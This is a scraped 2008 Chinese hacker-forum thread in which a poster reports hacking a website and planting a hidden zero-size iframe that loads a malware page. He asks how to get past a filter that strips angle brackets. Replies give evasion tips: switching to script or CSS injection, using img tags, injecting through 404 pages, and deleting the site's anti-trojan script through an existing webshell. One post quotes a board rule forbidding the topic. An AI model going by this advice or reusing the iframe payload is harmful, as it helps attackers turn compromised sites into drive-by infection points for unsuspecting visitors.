标题:
[讨论]挂马时碰到的问题......
[打印本页]
作者:
虚竹
时间:
2008-7-20 23:16
标题:
[讨论]挂马时碰到的问题......
[讨论]挂马时碰到的问题......
日到一站...挂马成功
<iframe width=0 height=0 src=http://www.xxx.com/m.htm></iframe>
挂上后查看源文件 被过滤成了..
<iframe width=0 height=0 src=http://www.xxx.com/m.htm></iframe>
<> 这2个符号被过滤.... 各位牛提供下解决办法...
作者:
东莞大岭山
时间:
2008-7-20 23:16
即使不过滤掉,中马的机率有多少?现在大多都打了补丁了?你的马能穿SP2不能?能的话发出来分享下
作者:
路上不塞车
时间:
2008-7-20 23:16
我很菜,只能给你点建议。
1:你去看看他网页中用到<>的地方怎么设置的,网页中应该有的吧。。<body>...........</body>等等,他怎么写的你也怎么写。。。
2:用CSS自定义样式。。把它那个给改了。具体你可以去看看CSS的东东。。有两篇文章很经典你可以去看看。《一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》,《二行代码解决全部网页木马(含iframe/script木马)》,还有vbs小铺的那个《关于<<二行代码解决全部网页木马>>的文章》。
帖子33 精华
0
积分48 阅读权限40 性别男 在线时间32 小时 注册时间2007-8-13 最后登录2008-4-24
查看详细资料
引用
报告
回复
TOP
软件项目外包
唐不狐
很黃很暴力
晶莹剔透§烈日灼然
作者:
bimuyu
时间:
2008-7-20 23:16
换一种挂马方式
如script 调用js挂,css挂马等。
如果有系统权限,弄个404挂马很不错的。
帖子145 精华
2
积分574 阅读权限50 性别男 来自china 在线时间106 小时 注册时间2005-9-27 最后登录2008-7-9
查看个人网站
查看详细资料
引用
报告
回复
TOP
jacksatan
晶莹剔透§烈日灼然
作者:
铁忠
时间:
2008-7-20 23:16
用js就可以了 现在挂马常用都是js 框架 淘汰了
帖子19 精华
0
积分19 阅读权限40 在线时间9 小时 注册时间2008-3-29 最后登录2008-6-21
查看详细资料
引用
报告
回复
TOP
少女暴富的隐秘(图)
fatcat
晶莹剔透§烈日灼然
作者:
marco
时间:
2008-7-20 23:16
受不了。一个个答非所问,明显过滤了"<"了,难道JS挂马就不用这个"<"了吗!楼主可以用img标签。
再说现在没有好网马的话就不用挂了,老是那些垃圾马没什么意思,中不了还被别人骂,有什么意思哦,呵呵晕啊晕
帖子45 精华
0
积分145 阅读权限40 性别男 来自浙江 在线时间68 小时 注册时间2004-11-9 最后登录2008-7-2
查看详细资料
引用
报告
回复
TOP
让女孩一夜变的更有女人味
cwa
cwa
晶莹剔透§烈日灼然
作者:
土人
时间:
2008-7-20 23:16
本版规则
给议题提出者:
01 本版的原创议题禁止讨论页面挂马、收信刷库、偷盗隐私、软绑架等明显违反法律和社会道德的话题。
作者:
老游子
时间:
2008-7-20 23:16
..我晕..难道JS挂马就不用<>了么?? ..我汗..看清楚题目在回答啊..OK?﹎.别拿天与地d\\'对立〆衡量你们与我的距离﹎.ˊ 传说中的blog:http://www.5213389.com
帖子109 精华
0
积分3057 阅读权限100 性别男 来自辽宁沈阳 在线时间108 小时 注册时间2006-5-8 最后登录2008-6-16
查看个人网站
查看详细资料
引用
报告
回复
TOP
1234506
晶莹剔透§烈日灼然
作者:
pat1110
时间:
2008-7-20 23:16
你这是XSS 还是直接修改原文件挂马啊?
XSS的话 就只能看看他标签地方 能不能利用了 不然没办法
直接改原文件的话 这种情况没见过~~~
帖子7 精华
0
积分9 阅读权限40 在线时间13 小时 注册时间2005-7-20 最后登录2008-5-20
查看详细资料
引用
报告
回复
TOP
绝情啊东
荣誉会员
作者:
彬彬
时间:
2008-7-20 23:16
不是XSS................﹎.别拿天与地d\\'对立〆衡量你们与我的距离﹎.ˊ 传说中的blog:http://www.5213389.com
帖子109 精华
0
积分3057 阅读权限100 性别男 来自辽宁沈阳 在线时间108 小时 注册时间2006-5-8 最后登录2008-6-16
查看个人网站
查看详细资料
引用
报告
回复
TOP
1234506
晶莹剔透§烈日灼然
作者:
lookyes
时间:
2008-7-20 23:16
你在本地上传个带<iframe>的文件试下 看他过滤了没
要是没过滤把他首页代码下下来 在本地改完了 在传上去试下
帖子7 精华
0
积分9 阅读权限40 在线时间13 小时 注册时间2005-7-20 最后登录2008-5-20
查看详细资料
引用
报告
回复
TOP
逍遥乾坤
晶莹剔透§烈日灼然
作者:
szyuewei
时间:
2008-7-20 23:16
貌似所有的网页中都要用到:<>符号吧。
你看你挂马页面中其它语句是怎么编写的,你就按照它的格式来,应该就没有问题了!
如果还不行,可能是它调用了某个“防挂”脚本,你既然已经有webshell了,那就找到那个脚本,删除掉.就ok了!
再者,如果嫌上面两种办法麻烦,就直接改别的挂马方式,比如前面人提到的js等等!
...................加我的QQ!
帖子6 精华
0
积分13 阅读权限40 在线时间18 小时 注册时间2005-12-13 最后登录2008-5-25
查看详细资料
引用
报告
回复
TOP
simpleboy
晶莹剔透§烈日灼然
作者:
weimei
时间:
2008-7-20 23:16
用这个script 标签试试吧只做安静的观众
帖子72 精华
2
积分224 阅读权限40 在线时间42 小时 注册时间2006-10-23 最后登录2008-7-2
查看详细资料
引用
报告
回复
TOP
poc
晶莹剔透§烈日灼然
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2